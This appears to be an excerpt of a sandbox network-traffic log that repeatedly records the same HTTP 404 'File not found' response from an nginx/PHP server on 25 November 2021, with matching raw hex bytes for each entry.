        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
